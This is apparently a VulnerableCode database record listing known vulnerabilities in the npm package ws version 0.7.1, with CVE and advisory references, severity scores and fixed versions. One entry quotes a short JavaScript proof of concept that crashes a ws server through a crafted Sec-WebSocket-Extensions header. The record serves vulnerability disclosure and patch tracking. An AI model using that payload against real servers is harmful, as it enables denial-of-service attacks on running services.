Lookup for vulnerable packages by Package URL.

Purl pkg:npm/ws@0.7.1
Type npm
Namespace
Name ws
Version 0.7.1
Qualifiers
Subpath
Is_vulnerable true
Next_non_vulnerable_version 1.1.5
Latest_non_vulnerable_version 8.20.1
Affected_by_vulnerabilities
0
url VCID-37mw-j411-a3az
vulnerability_id VCID-37mw-j411-a3az
summary
Improper Input Validation
ws is a "simple to use, blazing fast and thoroughly tested websocket client, server and console for node.js, up-to-date against RFC-6455". By sending an overly long websocket payload to a `ws` server, it is possible to crash the node process. This affects ws 1.1.0 and earlier.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-10542
reference_id
reference_type
scores
0
value 0.66075
scoring_system epss
scoring_elements 0.98537
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-10542
1
reference_url https://github.com/nodejs/node/issues/7388
reference_id
reference_type
scores
0
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/nodejs/node/issues/7388
2
reference_url https://nodesecurity.io/advisories/120
reference_id
reference_type
scores
url https://nodesecurity.io/advisories/120
3
reference_url https://www.npmjs.com/advisories/120
reference_id
reference_type
scores
0
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/advisories/120
4
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=927671
reference_id 927671
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=927671
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-10542
reference_id CVE-2016-10542
reference_type
scores
0
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-10542
6
reference_url https://github.com/advisories/GHSA-6663-c963-2gqg
reference_id GHSA-6663-c963-2gqg
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-6663-c963-2gqg
fixed_packages
0
url pkg:npm/ws@1.1.1
purl pkg:npm/ws@1.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-4851-mkc2-pqdw
1
vulnerability VCID-4u5m-kp7t-x3cf
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.1
aliases CVE-2016-10542, GHSA-6663-c963-2gqg
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-37mw-j411-a3az
1
url VCID-3znc-67dk-13bu
vulnerability_id VCID-3znc-67dk-13bu
summary
Remote Memory Disclosure
When given a number instead of a string, the ping function sends a non-zeroed buffer of the corresponding length, which exposes memory to the recipient.
references
0
reference_url https://github.com/websockets/ws/releases/tag/1.0.1
reference_id
reference_type
scores
url https://github.com/websockets/ws/releases/tag/1.0.1
fixed_packages
0
url pkg:npm/ws@1.0.1
purl pkg:npm/ws@1.0.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-37mw-j411-a3az
1
vulnerability VCID-4851-mkc2-pqdw
2
vulnerability VCID-4u5m-kp7t-x3cf
3
vulnerability VCID-hedn-18sd-bba2
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.0.1
aliases GMS-2016-2
risk_score null
exploitability 0.5
weighted_severity 0.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3znc-67dk-13bu
2
url VCID-4851-mkc2-pqdw
vulnerability_id VCID-4851-mkc2-pqdw
summary
Denial of Service
A specially crafted value of the `Sec-WebSocket-Extensions` header that uses `Object.prototype` property names as extension or parameter names can be used to make a `ws` server crash.
references
0
reference_url https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
reference_id
reference_type
scores
url https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
1
reference_url https://github.com/websockets/ws/releases/tag/3.3.1
reference_id
reference_type
scores
url https://github.com/websockets/ws/releases/tag/3.3.1
fixed_packages
0
url pkg:npm/ws@3.3.1
purl pkg:npm/ws@3.3.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-h5b4-kz93-r7g3
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1
aliases GMS-2017-331
risk_score null
exploitability 0.5
weighted_severity 0.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4851-mkc2-pqdw
3
url VCID-4u5m-kp7t-x3cf
vulnerability_id VCID-4u5m-kp7t-x3cf
summary
Denial of Service in ws
Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.

## Proof of concept

```javascript
const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r'
  ].join('\r');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
```


## Recommendation

Update to version 3.3.1 or later.
references
0
reference_url https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
1
reference_url https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407
2
reference_url https://nodesecurity.io/advisories/550
reference_id
reference_type
scores
url https://nodesecurity.io/advisories/550
3
reference_url https://snyk.io/vuln/npm:ws:20171108
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/npm:ws:20171108
4
reference_url https://www.npmjs.com/advisories/550
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/advisories/550
5
reference_url https://www.npmjs.com/advisories/550/versions
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/advisories/550/versions
6
reference_url https://github.com/advisories/GHSA-5v72-xg48-5rpm
reference_id GHSA-5v72-xg48-5rpm
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5v72-xg48-5rpm
fixed_packages
0
url pkg:npm/ws@1.1.5
purl pkg:npm/ws@1.1.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.5
1
url pkg:npm/ws@3.3.1
purl pkg:npm/ws@3.3.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-h5b4-kz93-r7g3
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1
aliases GHSA-5v72-xg48-5rpm, GMS-2019-145
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4u5m-kp7t-x3cf
4
url VCID-hedn-18sd-bba2
vulnerability_id VCID-hedn-18sd-bba2
summary
DoS due to excessively large websocket message
It is possible to crash the node process by sending an overly long websocket payload to a ws server.
references
0
reference_url https://github.com/nodejs/node/issues/7388
reference_id
reference_type
scores
url https://github.com/nodejs/node/issues/7388
1
reference_url https://github.com/websockets/ws/commit/0328a8f49f004f98d2913016214e93b2fc2713bc
reference_id
reference_type
scores
url https://github.com/websockets/ws/commit/0328a8f49f004f98d2913016214e93b2fc2713bc
fixed_packages
0
url pkg:npm/ws@1.1.1
purl pkg:npm/ws@1.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-4851-mkc2-pqdw
1
vulnerability VCID-4u5m-kp7t-x3cf
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.1
aliases GMS-2016-38
risk_score null
exploitability 0.5
weighted_severity 0.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hedn-18sd-bba2
5
url VCID-ja5c-kd68-67f3
vulnerability_id VCID-ja5c-kd68-67f3
summary
Improper Restriction of Operations within the Bounds of a Memory Buffer
A vulnerability was found in the ping functionality of the ws module before 1.0.0 which allowed clients to allocate memory by sending a ping frame. The ping functionality by default responds with a pong frame carrying the payload previously given in the ping frame. This is exactly what you expect, but internally ws always transforms all data that it needs to send into a Buffer instance, and that is where the vulnerability existed: ws did not do any checks on the type of data it was sending. With Buffers in Node, allocating one with a number instead of a string allocates that number of bytes.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-10518
reference_id
reference_type
scores
0
value 0.00345
scoring_system epss
scoring_elements 0.57288
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-10518
1
reference_url https://gist.github.com/c0nrad/e92005446c480707a74a
reference_id
reference_type
scores
0
value LOW
scoring_system generic_textual
scoring_elements
url https://gist.github.com/c0nrad/e92005446c480707a74a
2
reference_url https://github.com/websockets/ws/commit/29293ed11b679e0366fa0f6bb9310b330dafd795
reference_id
reference_type
scores
0
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/websockets/ws/commit/29293ed11b679e0366fa0f6bb9310b330dafd795
3
reference_url https://github.com/websockets/ws/releases/tag/1.0.1
reference_id
reference_type
scores
0
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/websockets/ws/releases/tag/1.0.1
4
reference_url https://nodesecurity.io/advisories/67
reference_id
reference_type
scores
url https://nodesecurity.io/advisories/67
5
reference_url https://www.npmjs.com/advisories/67
reference_id
reference_type
scores
0
value LOW
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/advisories/67
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-10518
reference_id CVE-2016-10518
reference_type
scores
0
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-10518
7
reference_url https://github.com/advisories/GHSA-2mhh-w6q8-5hxw
reference_id GHSA-2mhh-w6q8-5hxw
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-2mhh-w6q8-5hxw
fixed_packages
0
url pkg:npm/ws@1.0.1
purl pkg:npm/ws@1.0.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-37mw-j411-a3az
1
vulnerability VCID-4851-mkc2-pqdw
2
vulnerability VCID-4u5m-kp7t-x3cf
3
vulnerability VCID-hedn-18sd-bba2
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.0.1
aliases CVE-2016-10518, GHSA-2mhh-w6q8-5hxw
risk_score 1.4
exploitability 0.5
weighted_severity 2.7
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ja5c-kd68-67f3
Fixing_vulnerabilities
Risk_score 4.0
Resource_url http://public2.vulnerablecode.io/packages/pkg:npm/ws@0.7.1